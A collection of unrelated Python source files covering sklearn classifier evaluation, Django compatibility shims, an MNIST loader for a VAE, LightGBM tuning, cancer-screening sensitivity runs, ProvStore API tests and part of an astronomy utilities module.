('classifier', classifier_rfc),
],
)
model_rfc.fit(X_train, y_train)
y_pred_rfc = model_rfc.predict(X_test)
name_rfc = 'grad_boost'
classifier_rfc = ensemble.GradientBoostingClassifier(
n_estimators = 100,
max_depth = 2,
random_state = 0,
)
model_rfc = pipeline.Pipeline(
steps = [
('preprocessor_all', preprocessor_all),
('classifier', classifier_rfc),
],
)
model_rfc.fit(X_train, y_train)
y_pred_rfc = model_rfc.predict(X_test)
###############
## Evaluate models
###############
compare_2D(X_test, y_test, y_pred_rfc, name_rfc, handles)
compare_3D(X_test, y_test, y_pred_rfc, name_rfc, handles)
y_test_inv = label_encoder.inverse_transform(y_test)
y_pred_inv_rfc = label_encoder.inverse_transform(y_pred_rfc)
model_metrics(X_test, y_test, y_pred_rfc, model_rfc, name_rfc) |
"""
The `compat` module provides support for backwards compatibility with older
versions of django/python, and compatibility wrappers around optional packages.
"""
# flake8: noqa
from __future__ import unicode_literals
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
from django.db import connection, transaction
from django.utils.encoding import force_text
from django.utils.six.moves.urllib.parse import urlparse as _urlparse
from django.utils import six
import django
import inspect
try:
import importlib
except ImportError:
from django.utils import importlib
def unicode_repr(instance):
# Get the repr of an instance, but ensure it is a unicode string
# on both python 3 (already the case) and 2 (not the case).
if six.PY2:
return repr(instance).decode('utf-8')
return repr(instance)
def unicode_to_repr(value):
# Coerce a unicode string to the correct repr return type, depending on
# the Python version. We wrap all our `__repr__` implementations with
# this and then use unicode throughout internally.
if six.PY2:
return value.encode('utf-8')
return value
def unicode_http_header(value):
# Coerce HTTP header value to unicode.
if isinstance(value, six.binary_type):
return value.decode('iso-8859-1')
return value
def total_seconds(timedelta):
# TimeDelta.total_seconds() is only available in Python 2.7
if hasattr(timedelta, 'total_seconds'):
return timedelta.total_seconds()
else:
return (timedelta.days * 86400.0) + float(timedelta.seconds) + (timedelta.microseconds / 1000000.0)
# OrderedDict only available in Python 2.7.
# This will always be the case in Django 1.7 and above, as these versions
# no longer support Python 2.6.
# For Django <= 1.6 and Python 2.6 fall back to SortedDict.
try:
from collections import OrderedDict
except ImportError:
from django.utils.datastructures import SortedDict as OrderedDict
# HttpResponseBase only exists from 1.5 onwards
try:
from django.http.response import HttpResponseBase
except ImportError:
from django.http import HttpResponse as HttpResponseBase
# contrib.postgres only supported from 1.8 onwards.
try:
from django.contrib.postgres import fields as postgres_fields
except ImportError:
postgres_fields = None
# request only provides `resolver_match` from 1.5 onwards.
def get_resolver_match(request):
try:
return request.resolver_match
except AttributeError:
# Django < 1.5
from django.core.urlresolvers import resolve
return resolve(request.path_info)
# django-filter is optional
try:
import django_filters
except ImportError:
django_filters = None
if django.VERSION >= (1, 6):
def clean_manytomany_helptext(text):
return text
else:
# Up to version 1.5 many to many fields automatically suffix
# the `help_text` attribute with hardcoded text.
def clean_manytomany_helptext(text):
if text.endswith(' Hold down "Control", or "Command" on a Mac, to select more than one.'):
text = text[:-69]
return text
# Django-guardian is optional. Import only if guardian is in INSTALLED_APPS
# Fixes (#1712). We keep the try/except for the test suite.
guardian = None
if 'guardian' in settings.INSTALLED_APPS:
try:
import guardian
import guardian.shortcuts # Fixes #1624
except ImportError:
pass
def get_model_name(model_cls):
try:
return model_cls._meta.model_name
except AttributeError:
# < 1.6 used module_name instead of model_name
return model_cls._meta.module_name
# Support custom user models in Django 1.5+
try:
from django.contrib.auth import get_user_model
except ImportError:
from django.contrib.auth.models import User
get_user_model = lambda: User
# View._allowed_methods only present from 1.5 onwards
if django.VERSION >= (1, 5):
from django.views.generic import View
else:
from django.views.generic import View as DjangoView
class View(DjangoView):
def _allowed_methods(self):
return [m.upper() for m in self.http_method_names if hasattr(self, m)]
# MinValueValidator, MaxValueValidator et al. only accept `message` in 1.8+
if django.VERSION >= (1, 8):
from django.core.validators import MinValueValidator, MaxValueValidator
from django.core.validators import MinLengthValidator, MaxLengthValidator
else:
from django.core.validators import MinValueValidator as DjangoMinValueValidator
from django.core.validators import MaxValueValidator as DjangoMaxValueValidator
from django.core.validators import MinLengthValidator as DjangoMinLengthValidator
from django.core.validators import MaxLengthValidator as DjangoMaxLengthValidator
class MinValueValidator(DjangoMinValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinValueValidator, self).__init__(*args, **kwargs)
class MaxValueValidator(DjangoMaxValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxValueValidator, self).__init__(*args, **kwargs)
class MinLengthValidator(DjangoMinLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinLengthValidator, self).__init__(*args, **kwargs)
class MaxLengthValidator(DjangoMaxLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxLengthValidator, self).__init__(*args, **kwargs)
# URLValidator only accepts `message` in 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import URLValidator
else:
from django.core.validators import URLValidator as DjangoURLValidator
class URLValidator(DjangoURLValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(URLValidator, self).__init__(*args, **kwargs)
# EmailValidator requires explicit regex prior to 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import EmailValidator
else:
from django.core.validators import EmailValidator as DjangoEmailValidator
from django.core.validators import email_re
class EmailValidator(DjangoEmailValidator):
def __init__(self, *args, **kwargs):
super(EmailValidator, self).__init__(email_re, *args, **kwargs)
# PATCH method is not implemented by Django
if 'patch' not in View.http_method_names:
View.http_method_names = View.http_method_names + ['patch']
# RequestFactory only provides `generic` from 1.5 onwards
from django.test.client import RequestFactory as DjangoRequestFactory
from django.test.client import FakePayload
try:
# In 1.5 the test client uses force_bytes
from django.utils.encoding import force_bytes as force_bytes_or_smart_bytes
except ImportError:
# In 1.4 the test client just uses smart_str
from django.utils.encoding import smart_str as force_bytes_or_smart_bytes
class RequestFactory(DjangoRequestFactory):
def generic(self, method, path,
data='', content_type='application/octet-stream', **extra):
parsed = _urlparse(path)
data = force_bytes_or_smart_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': force_text(parsed[4]),
'REQUEST_METHOD': six.text_type(method),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': six.text_type(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
return self.request(**r)
# Markdown is optional
try:
import markdown
def apply_markdown(text):
"""
Simple wrapper around :func:`markdown.markdown` to set the base level
of '#' style headers to <h2>.
"""
extensions = ['headerid(level=2)']
safe_mode = False
md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
return md.convert(text)
except ImportError:
apply_markdown = None
# `separators` argument to `json.dumps()` differs between 2.x and 3.x
# See: http://bugs.python.org/issue22767
if six.PY3:
SHORT_SEPARATORS = (',', ':')
LONG_SEPARATORS = (', ', ': ')
INDENT_SEPARATORS = (',', ': ')
else:
SHORT_SEPARATORS = (b',', b':')
LONG_SEPARATORS = (b', ', b': ')
INDENT_SEPARATORS = (b',', b': ')
if django.VERSION >= (1, 8):
from django.db.models import DurationField
from django.utils.dateparse import parse_duration
from django.utils.duration import duration_string
else:
DurationField = duration_string = parse_duration = None
def set_rollback():
if hasattr(transaction, 'set_rollback'):
if connection.settings_dict.get('ATOMIC_REQUESTS', False):
# If running in >=1.6 then mark a rollback as required,
# and allow it to be handled by Django.
transaction.set_rollback(True)
elif transaction.is_managed():
# Otherwise handle it explicitly if in managed mode.
if transaction.is_dirty():
transaction.rollback()
transaction.leave_transaction_management()
else:
# transaction not managed
pass
|
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
from sklearn.utils import shuffle
from hparams import HParams
import jax
from flax import jax_utils
try:
from ..utils.normalizer import Normalizer
from ..utils.utils import compute_latent_dimension
except (ImportError, ValueError):
from utils.normalizer import Normalizer
from utils.utils import compute_latent_dimension
hparams = HParams.get_hparams_by_name("efficient_vdvae")
def load_and_shard_tf_batch(xs, global_batch_size):
local_device_count = jax.local_device_count()
def _prepare(x):
return x.reshape((local_device_count, global_batch_size // local_device_count) + x.shape[1:])
return jax.tree_map(_prepare, xs)
def create_synthesis_mnist_dataset():
if hparams.synthesis.synthesis_mode == 'reconstruction':
_, _, test_images = download_mnist_datasets()
test_data = tf.data.Dataset.from_tensor_slices(test_images)
test_data = test_data.interleave(
lambda x: tf.data.Dataset.from_tensor_slices(tensors=(x[tf.newaxis, ...], x[tf.newaxis, ...])),
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False
)
test_data = test_data.batch(
hparams.synthesis.batch_size,
drop_remainder=True
)
test_data = test_data.prefetch(tf.data.AUTOTUNE)
test_data = tfds.as_numpy(test_data)
test_data = map(lambda x: load_and_shard_tf_batch(x, hparams.synthesis.batch_size), test_data)
test_data = jax_utils.prefetch_to_device(test_data, 10)
return test_data
elif hparams.synthesis.synthesis_mode == 'div_stats':
train_data, _, _ = download_mnist_datasets()
n_train_samples = train_data.shape[0]
train_data = tf.data.Dataset.from_tensor_slices(train_data)
# Take a subset of the data
train_data = train_data.shuffle(n_train_samples)
train_data = train_data.take(int(hparams.synthesis.div_stats_subset_ratio * n_train_samples))
# Preprocess subset and prefect to device
train_data = train_data.interleave(
data_prep,
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False)
train_data = train_data.batch(
hparams.synthesis.batch_size,
drop_remainder=True
)
train_data = train_data.prefetch(tf.data.AUTOTUNE)
train_data = tfds.as_numpy(train_data)
train_data = map(lambda x: load_and_shard_tf_batch(x, hparams.synthesis.batch_size), train_data)
train_data = jax_utils.prefetch_to_device(train_data, 10)
return train_data
elif hparams.synthesis.synthesis_mode == 'encoding':
train_data, _, _ = download_mnist_datasets()
train_filenames = make_toy_filenames(train_data)
train_data = tf.data.Dataset.from_tensor_slices((train_data, train_filenames))
train_data = train_data.interleave(
named_data_prep,
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False
)
train_data = train_data.batch(
hparams.synthesis.batch_size,
drop_remainder=True
)
train_data = train_data.prefetch(tf.data.AUTOTUNE)
train_data = tfds.as_numpy(train_data)
train_data = map(lambda x: (load_and_shard_tf_batch(x[0], hparams.synthesis.batch_size), x[1]), train_data)
return train_data
else:
return None
def named_data_prep(img, filename):
inputs = data_prep(img, return_targets=False)
return tf.data.Dataset.from_tensor_slices(tensors=(inputs, filename[tf.newaxis]))
def data_prep(img, use_tf=True, return_targets=True):
# Binarize (random bernoulli)
if use_tf:
# Used repeatedly during training on a per-sample basis
noise = tf.random.uniform(shape=img.shape, minval=0., maxval=1., dtype=img.dtype)
targets = inputs = tf.cast(noise <= img, tf.float32)
if return_targets:
# [1, H, W, C]
return tf.data.Dataset.from_tensor_slices(tensors=(inputs[tf.newaxis, ...], targets[tf.newaxis, ...]))
else:
return inputs[tf.newaxis, ...]
else:
# Used once for val and test data on a per-data basis
noise = np.random.uniform(low=0., high=1., size=img.shape).astype(img.dtype)
data = (noise <= img).astype(np.float32)
# [n_samples, H, W, C]
return data
def download_mnist_datasets():
# Ignore labels
(x_train, _), (x_test, _) = tf.keras.datasets.mnist.load_data()
x_train = x_train[..., np.newaxis] / 255. # (60000, 28, 28, 1)
x_test = x_test[..., np.newaxis] / 255. # (10000, 28, 28, 1)
# make images of size 32x32
x_train = np.pad(x_train, pad_width=((0, 0), (2, 2), (2, 2), (0, 0))) # (60000, 32, 32, 1)
x_test = np.pad(x_test, pad_width=((0, 0), (2, 2), (2, 2), (0, 0))) # (60000, 32, 32, 1)
x_train = shuffle(x_train)
x_test = shuffle(x_test, random_state=101) # Fix this seed to not overlap val and test between train and inference runs
x_val = x_test[:len(x_test) // 2] # 5000
x_test = x_test[len(x_test) // 2:] # 5000
x_val = data_prep(x_val, use_tf=False)
x_test = data_prep(x_test, use_tf=False)
return x_train, x_val, x_test
def make_toy_filenames(data):
return [f'image_{i}' for i in range(data.shape[0])]
def create_mnist_datasets():
train_images, val_images, _ = download_mnist_datasets()
n_train_samples = train_images.shape[0]
n_val_samples = val_images.shape[0]
train_data = tf.data.Dataset.from_tensor_slices(train_images).cache()
val_data = tf.data.Dataset.from_tensor_slices(val_images).cache()
# Repeat data across epochs
train_data = train_data.repeat()
val_data = val_data.repeat()
# Shuffle samples with a buffer of the size of the dataset
train_data = train_data.shuffle(n_train_samples)
val_data = val_data.shuffle(n_val_samples)
train_data = train_data.interleave(
data_prep,
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False
)
val_data = val_data.interleave(
lambda x: tf.data.Dataset.from_tensor_slices(tensors=(x[tf.newaxis, ...], x[tf.newaxis, ...])),
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=False
)
# cache, Batch, prefetch
train_data = train_data.batch(
hparams.train.batch_size,
drop_remainder=True
)
train_data = train_data.prefetch(tf.data.AUTOTUNE)
val_data = val_data.batch(
hparams.val.batch_size,
drop_remainder=True
)
val_data = val_data.prefetch(tf.data.AUTOTUNE)
train_data = tfds.as_numpy(train_data)
val_data = tfds.as_numpy(val_data)
train_data = map(lambda x: load_and_shard_tf_batch(x, hparams.train.batch_size), train_data)
train_data = jax_utils.prefetch_to_device(train_data, 5)
val_data = map(lambda x: load_and_shard_tf_batch(x, hparams.val.batch_size), val_data)
val_data = jax_utils.prefetch_to_device(val_data, 1)
return train_data, val_data
|
<filename>oaprogression/training/lgbm_tools.py
import warnings
from functools import partial
import lightgbm as lgb
import numpy as np
import pandas as pd
from hyperopt import hp, fmin, tpe, STATUS_OK, Trials, space_eval
from tqdm import tqdm
def fit_lgb(params, train_folds, feature_set, metric, return_oof_res=False, return_models=False):
oof_results = []
clfs = []
for fold_id, (train_split, val_split) in enumerate(train_folds): # Going through the prepared fold splits
d_train_prog = lgb.Dataset(train_split[feature_set], label=train_split.Progressor.values > 0)
d_val_prog = lgb.Dataset(val_split[feature_set], label=val_split.Progressor.values > 0)
with warnings.catch_warnings():
# LGBM throws annoying messages, because we do not set the number
# of iterations as a parameter
warnings.simplefilter("ignore")
clf_prog = lgb.train(params, d_train_prog, valid_sets=(d_train_prog, d_val_prog), verbose_eval=False)
preds_prog = clf_prog.predict(val_split[feature_set], num_iteration=clf_prog.best_iteration)
res = pd.DataFrame(data={'ID': val_split.ID.values, 'Side': val_split.Side.values, 'prog_pred': preds_prog,
'Progressor': val_split.Progressor.values > 0})
oof_results.append(res)
clfs.append(clf_prog)
oof_results = pd.concat(oof_results)
res = list()
res.append(metric(oof_results.Progressor.values.astype(int),
oof_results.prog_pred.values.astype(float)))
if return_models:
res.append(clfs)
if return_oof_res:
res.append(oof_results)
if len(res) == 1:
return res[0]
else:
return res
def init_lgbm_param_grid(seed):
params = dict()
params['num_iterations'] = hp.choice('num_iterations', [10, 100, 1000, 2000, 3000])
params['early_stopping_round'] = hp.choice('early_stopping_round', [50, 100])
params['learning_rate'] = hp.loguniform('learning_rate', -5, -3)
params['boosting_type'] = hp.choice('boosting_type', ['gbdt', 'dart'])
params['objective'] = 'binary'
params['metric'] = 'binary_logloss'
params['num_leaves'] = 2 + hp.randint('num_leaves', 21),
params['max_depth'] = 3 + hp.randint('max_depth', 11),
params['num_threads'] = 8
params['feature_fraction'] = hp.uniform('feature_fraction', 0.6, 0.95)
params['bagging_fraction'] = hp.uniform('bagging_fraction', 0.4, 0.95)
params['bagging_freq'] = 1 + hp.randint('bagging_freq', 9),
params['seed'] = seed
params['bagging_seed'] = seed
params['verbose'] = -1
return params
def eval_lgb_objective(space, train_folds, feature_set, metric, callback=None):
res = fit_lgb(space, train_folds, feature_set, metric, False, False)
if callback is not None:
callback()
return {'loss': 1 - res, 'status': STATUS_OK}
def optimize_lgbm_hyperopt(train_folds, feature_set, metric, seed, hyperopt_trials=100):
trials = Trials()
pbar = tqdm(total=hyperopt_trials, desc="Hyperopt:")
param_space = init_lgbm_param_grid(seed)
best = fmin(fn=partial(eval_lgb_objective, train_folds=train_folds,
feature_set=feature_set, metric=metric, callback=lambda: pbar.update()),
space=param_space,
algo=tpe.suggest,
max_evals=hyperopt_trials,
trials=trials,
verbose=0,
rstate=np.random.RandomState(seed))
pbar.close()
return space_eval(param_space, best), trials
|
<filename>code/main_sensitivity_analyses.py
import pandas as pd
from utils.functions import psa_function, lognormal
from utils.parameters import Params
from models.no_screening import NoScreening
from models.no_screening_noMRI import NoScreeningNoMRI
from models.age_screening import AgeScreening
from models.age_screening_noMRI import AgeScreeningNoMRI
from models.prs_screening import PrsScreening
from models.prs_screening_noMRI import PrsScreeningNoMRI
sims = 10000
PATH = '...'
params = Params(PATH=PATH, sims=sims)
params.gen_params()
reference_absolute_risk = ['2.0', '2.5', '3.0', '3.5', '4.0', '4.5', '5.0',
'5.5', '6.0', '6.5', '7.0', '7.5', '8.0', '8.5',
'9.0', '9.5', '10.0']
def run_analyses(params, sensitivity_analysis, od_by_risk:bool=False):
for reference_value in reference_absolute_risk:
pathname = f'{PATH}data/model_outputs/sensitivity_analyses/{sensitivity_analysis}{reference_value}/'
a_risk = pd.read_csv(f'{PATH}data/processed/a_risk/a_risk_{reference_value}.csv').set_index('age')
NoScreening(params).write_to_file(PATH=pathname, name='no_screening',
reference_value=reference_value)
NoScreeningNoMRI(params).write_to_file(PATH=pathname, name='no_screening_noMRI',
reference_value=reference_value)
AgeScreening(params).write_to_file(PATH=pathname, name='age_screening',
reference_value=reference_value)
AgeScreeningNoMRI(params).write_to_file(PATH=pathname, name='age_screening_noMRI',
reference_value=reference_value)
PrsScreening(params, a_risk, od_by_risk).write_to_file(PATH=pathname, name='prs_screening',
reference_value=reference_value)
PrsScreeningNoMRI(params, a_risk, od_by_risk).write_to_file(PATH=pathname, name='prs_screening_noMRI',
reference_value=reference_value)
# PRS cost
# £50 per PRS
prs = Params(PATH=PATH, sims=sims)
prs.gen_params()
prs.cost_prs = psa_function(50, sims)
run_analyses(prs, 'prs_cost/50/')
# £100 per PRS
prs.cost_prs = psa_function(100, sims)
run_analyses(prs, 'prs_cost/100/')
# MRI cost
# £100 per MRI
mri = Params(PATH=PATH, sims=sims)
mri.gen_params()
mri.cost_mri = psa_function(100, sims)
run_analyses(mri, 'mri_cost/100/')
# £200 per MRI
mri.cost_mri = psa_function(200, sims)
run_analyses(mri, 'mri_cost/200/')
# Using assumptions from the PRECISION study regarding impact of MRI prior to biopsy on clinically significant & insignificant cancers detected
precision = Params(PATH=PATH, sims=sims)
precision.cs_mri = lognormal(0.1133, 0.0373, sims)
precision.cs_mri[precision.cs_mri < 1] = 1
precision.cis_mri = lognormal(-0.1393, 0.03596, sims)
precision.gen_params()
run_analyses(precision, 'PRECISION/')
# Overdiagnosis varying with polygenic risk
od = Params(PATH=PATH, sims=sims)
od.gen_params()
run_analyses(od, 'overdiagnosis/', od_by_risk=True)
# Varying uptake with screening
uptake_prs = Params(PATH=PATH, sims=sims)
uptake_prs.uptake_prs = 0.75
uptake_prs.gen_params()
run_analyses(uptake_prs, 'uptake_prs/')
uptake_psa = Params(PATH=PATH, sims=sims)
uptake_psa.uptake_psa = 0.75
uptake_psa.gen_params()
run_analyses(uptake_psa, 'uptake_psa/')
|
<gh_stars>0
"""Test class for ProvStore service.
"""
# Copyright (c) 2015 University of Southampton
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import requests
import unittest
from nose.tools import istest
from nose_parameterized import parameterized
from prov_service_tests import http
from prov_service_tests import standards
from prov_service_tests.test_service import ServiceTestCase
@istest
class ProvStoreTestCase(ServiceTestCase):
"""Test class for ProvStore service. These tests check that
ProvStore is available and responds to requests directed against the
`ProvStore REST API <https://provenance.ecs.soton.ac.uk/store/help/api/>`_.
The class expects two environment variables to be set:
- ``PROVSTORE_URL`` - ProvStore base URL e.g.
``https://provenance.ecs.soton.ac.uk/store/api/v0/documents/``
- ``PROVSTORE_API_KEY`` - ProvStore user name and API key e.g.
``user:12345qwert``
"""
URL_ENV = "PROVSTORE_URL"
"""str or unicode: namr of environment variable holding ProvStore
URL
"""
API_KEY_ENV = "PROVSTORE_API_KEY"
"""str or unicode: environment variable holding ProvStore API key
"""
CONTENT_TYPES = {
standards.PROVN: "text/provenance-notation",
standards.TTL: "text/turtle",
standards.TRIG: "application/trig",
standards.PROVX: "application/xml",
standards.JSON: "application/json"
}
"""dict: mapping from :mod:`prov_service_tests.standards` formats to
content types understood by ProvStore
"""
EXTENSIONS = {
standards.PROVX: "xml"
}
"""dict: mapping from :mod:`prov_service_tests.standards` formats to
file extensions understood by ProvStore
"""
def setUp(self):
super(ProvStoreTestCase, self).setUp()
self.url = os.environ[ProvStoreTestCase.URL_ENV]
self.authorization = "ApiKey " + \
os.environ[ProvStoreTestCase.API_KEY_ENV]
self.document_url = None
def tearDown(self):
super(ProvStoreTestCase, self).tearDown()
if self.document_url is not None:
response = requests.delete( \
self.document_url,
headers={http.AUTHORIZATION: self.authorization})
if response.status_code != requests.codes.no_content:
print("Warning: " + self.document_url +
" may not have been deleted")
def post(self, document, format=standards.JSON):
"""Submit authorized POST /store/api/v0/documents/.
The document URL is cached by the class. A test is done to check
that the response code is 201 CREATED.
:param document: document in given format
:type document: str or unicode
:param format: a :mod:`prov_service_tests.standards` format
:type format: str or unicode
:return: URL of stored document
:rtype: str or unicode
"""
headers = {http.CONTENT_TYPE: ProvStoreTestCase.CONTENT_TYPES[format],
http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.JSON],
http.AUTHORIZATION: self.authorization}
request = {"content": document,
"public": True,
"rec_id": self.__class__.__name__ + str(os.getpid())}
response = requests.post(self.url,
headers=headers,
data=json.dumps(request))
self.assertEqual(requests.codes.created, response.status_code)
response_json = json.loads(response.text)
return self.url + str(response_json["id"])
def test_get_documents(self):
"""Test GET /store/api/v0/documents/.
"""
response = requests.get(self.url)
self.assertEqual(requests.codes.ok, response.status_code)
@parameterized.expand(standards.FORMATS)
def test_post_document(self, format):
"""Test POST /store/api/v0/documents/.
"""
self.document_url = self.post(self.get_primer(format), format)
self.assertNotEqual(None, self.document_url)
def test_delete_document(self):
"""Test DELETE /store/api/v0/documents/:id/.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
headers = {http.AUTHORIZATION: self.authorization}
response = requests.delete(self.document_url, headers=headers)
self.assertEqual(requests.codes.no_content, response.status_code)
self.document_url = None
def test_get_document(self):
"""Test GET /store/api/v0/documents/:id/.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
response = requests.get(self.document_url)
self.assertEqual(requests.codes.ok, response.status_code)
@parameterized.expand(standards.FORMATS)
def test_get_document_format(self, format):
"""Test GET /store/api/v0/documents/:id.:format.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
# Map format to extension supported by ProvStore
if format in ProvStoreTestCase.EXTENSIONS:
format = ProvStoreTestCase.EXTENSIONS[format]
response = requests.get(self.document_url + "." + format)
self.assertEqual(requests.codes.ok, response.status_code)
def test_get_document_flattened(self):
"""Test GET /store/api/v0/documents/:id/flattened/.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
headers = {http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.PROVN]}
response = requests.get(self.document_url + "/flattened",
headers=headers)
self.assertEqual(requests.codes.ok, response.status_code)
def test_get_document_flattened_views_data(self):
"""Test GET /store/api/v0/documents/:id/flattened/views/data.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
headers = {http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.PROVN]}
response = requests.get(self.document_url + "/flattened/views/data",
headers=headers)
self.assertEqual(requests.codes.ok, response.status_code)
def test_get_document_bundles(self):
"""Test GET /store/api/v0/documents/:id/bundles.
"""
self.document_url = self.post(self.get_primer(standards.JSON))
response = requests.get(self.document_url + "/bundles")
self.assertEqual(requests.codes.ok, response.status_code)
def post_bundle(self, document):
"""Submit GET /store/api/v0/documents/:doc_id/bundles/:bundle_id.
- Submit authorized POST /store/api/v0/documents/ with a document
that contains bundles.
- Extract the document URL from HTTP response.
- Cache the document URL in the class.
- Submit GET /store/api/v0/documents/:doc_id/bundles/ request.
- Get the URL of the first bundle.
- Submit GET /store/api/v0/documents/:doc_id/bundles/:bundle_id
request.
- Return bundle URL.
Tests are done to check response codes and that at least one
bundle is available.
:param document: document in JSON format
:type document: str or unicode
:return: URL of bundle
:rtype: str or unicode
"""
self.document_url = self.post(document)
response = requests.get(self.document_url + "/bundles")
self.assertEqual(requests.codes.ok, response.status_code)
response_json = json.loads(response.text)
objects = response_json["objects"]
self.assertTrue(len(objects) > 0, msg="Expected at least one bundle")
bundle_url = self.document_url + "/bundles/" + str(objects[0]["id"])
response = requests.get(bundle_url)
self.assertEqual(requests.codes.ok, response.status_code)
return bundle_url
def test_get_document_bundles_bundle(self):
"""Test GET /store/api/v0/documents/:doc_id/bundles/:bundle_id.
"""
self.post_bundle(self.get_document("bundle.json"))
@parameterized.expand(standards.FORMATS)
def test_get_document_bundles_bundle_format(self, format):
"""Test GET /store/api/v0/documents/:doc_id/bundles/:bundle_id(.:format).
"""
bundle_url = self.post_bundle(self.get_document("bundle.json"))
# Map format to extension supported by ProvStore
if format in ProvStoreTestCase.EXTENSIONS:
format = ProvStoreTestCase.EXTENSIONS[format]
response = requests.get(bundle_url + "." + format)
self.assertEqual(requests.codes.ok, response.status_code)
|
<filename>brav0/utils.py
import glob
import pickle
import warnings
from datetime import datetime
from pathlib import Path
from typing import Optional, Union
import numpy as np
import pandas as pd
import yaml
from astropy.table import Table
from box import Box
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from tqdm import tqdm
from xarray.core.dataset import Dataset
from brav0.model import ZeroPointModel
def pathglob(pattern: Union[str, Path]) -> list[str]:
"""
Tiny glob wrapper to handle python Path object from pathlib
:param pattern: Path or string representing a glob pattern
:type pattern: Union[str, Path]
:return: List of individual paths
:rtype: list[str]
"""
return glob.glob(str(pattern))
def generate_flist(pattern: Union[str, Path], ext: str = ".rdb") -> list[str]:
pattern = Path(pattern)
if pattern.is_dir():
# Glob all files in directory
flist = pathglob(pattern / f"*{ext}")
else:
# Glob pattern directly
flist = pathglob(pattern)
return flist
def append_to_dirpath(path: Path, extra: str) -> Path:
"""
Add a string to a path object (usually useful for directories)
:param path: Initial path
:type path: Path
:param extra: Appended string
:type extra: str
:return: Path with the string appended to its basename
:rtype: Path
"""
return path.parent / (path.name + extra)
def get_wmean(data: DataFrame, col_pairs: dict[str, str]) -> Series:
"""
Get the weighted mean and error of a dataframe using column pairs
:param data: Input dataframe
:type data: DataFrame
:param col_pairs: Column pairs (value -> error mapping)
:type col_pairs: Dict
:return: Series with the weighted mean and the error for each binned value
:rtype: Series
"""
val_cols = pd.Index(list(col_pairs.keys()))
err_cols = pd.Index(list(col_pairs.values()))
vals = data[val_cols].astype(float)
errs = data[err_cols].astype(float)
errs2 = errs ** 2
output = pd.Series(index=data.columns, dtype=float)
# Get values and error columns where all nan errors
nan_col_mask = errs2.isna().all().values
val_cols_nan = val_cols[nan_col_mask]
err_cols_nan = err_cols[nan_col_mask]
nan_cols = val_cols_nan.union(err_cols_nan)
output[nan_cols] = np.nan
output[nan_cols] = np.nan
good_cols = data.columns[~data.columns.isin(nan_cols)]
val_cols_good = val_cols[val_cols.isin(good_cols)]
err_cols_good = err_cols[err_cols.isin(good_cols)]
good_vals = vals[val_cols_good].values
good_errs2 = errs2[err_cols_good].values
output[val_cols_good] = np.nansum(
good_vals / good_errs2, axis=0
) / np.nansum(1 / good_errs2, axis=0)
output[err_cols_good] = np.sqrt(1 / np.nansum(1 / good_errs2, axis=0))
return output
def get_binned_data(
data: DataFrame, wmean_pairs: Optional[dict[str, str]] = None
) -> DataFrame:
"""
Bin dataframe with three possible operations:
- Weighted mean: for wmean_pairs columns, takes both a value and its error
- Regular mean: take mean of values
- First: keep first value
The dataframe is grouped by file and date, then binned.
:param data: DataFrame with OBJECT and DATE-OBS info, plus other quantities
:type data: DataFrame
:param wmean_pairs: Pairs of value->error columns to use for weighted means
:type wmean_pairs: Dict, optional
:return: Dataframe binned per day
:rtype: DataFrame
"""
# Get a list of all columsn involved in the weighted means
# num_cols = data.select_dtypes(include=np.number).columns
# nonum_cols = data.select_dtypes(exclude=np.number).columns
# data = data.astype
grouped_data = data.groupby(["OBJECT", "DATE-OBS"])
if wmean_pairs is not None:
wmean_all_cols = list(wmean_pairs.keys())
wmean_all_cols.extend(list(wmean_pairs.values()))
# For other columns, either use a simple mean for numbers or keep first
no_wmean_cols = data.columns[~data.columns.isin(wmean_all_cols)]
mean_cols = (
